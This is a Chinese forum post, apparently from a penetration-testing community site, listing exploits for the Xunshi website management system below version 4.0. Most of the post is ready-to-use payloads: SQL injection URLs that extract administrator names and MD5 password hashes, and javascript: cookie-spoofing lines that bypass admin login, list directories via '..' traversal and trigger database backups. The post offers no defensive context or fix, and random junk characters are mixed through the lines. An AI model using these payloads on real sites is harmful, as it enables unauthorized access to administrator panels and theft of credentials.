中国网络渗透测试联盟

标题: 讯时网站管理系统4.0以下漏洞 [打印本页]

作者: admin    时间: 2016-5-11 14:55
标题: 讯时网站管理系统4.0以下漏洞
一、注入# \; B9 X5 }7 a4 r' _) w1 `4 _5 _1 I  H
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
7 ~% O3 A8 D, b$ H9 U. ]( Q9 B2 `3 n8 t0 f" [: \2 ?
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
7 y2 ?3 h! J4 m- u9 O% a4 d3 W& C第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
. S' c5 Q. y- f. n  x2 G; z可得到用户名和MD5加密码的密码。
  [- L8 |2 e2 Z  g$ k4 N" R; S6 ?* C. h+ e3 y, [% Y' j$ q
二、cookies欺骗! }' p) {' H! ^, y- d
" C/ a/ }, \; H- C( \" H7 E8 G8 ~9 \
1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞.
7 s; M: t$ |4 d& M7 ]javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"3 u+ N, `( h+ f3 V4 N+ o* O" B
" c9 z0 N) c6 m+ I* ?! f) f- d
2、列目录.   z8 m: @& h3 L9 z+ Q! e/ G
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=..": n# {9 J: T5 {( D2 B! W$ Y' z. x

( N! i& Z% L' y* Y& N3 [/ M3、数据库备份(适用性好像比较低.) 9 l  z) b3 Y" H; [# `' C  B6 c
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"& [( H) _8 S5 A3 H

4 O- r! [& r# F! `; d4、得到MD5密码解不了密进后台方法4 H; V: j  p* v6 v! v
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
  U: [8 P, I- x0 n* F7 h$ i! M




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2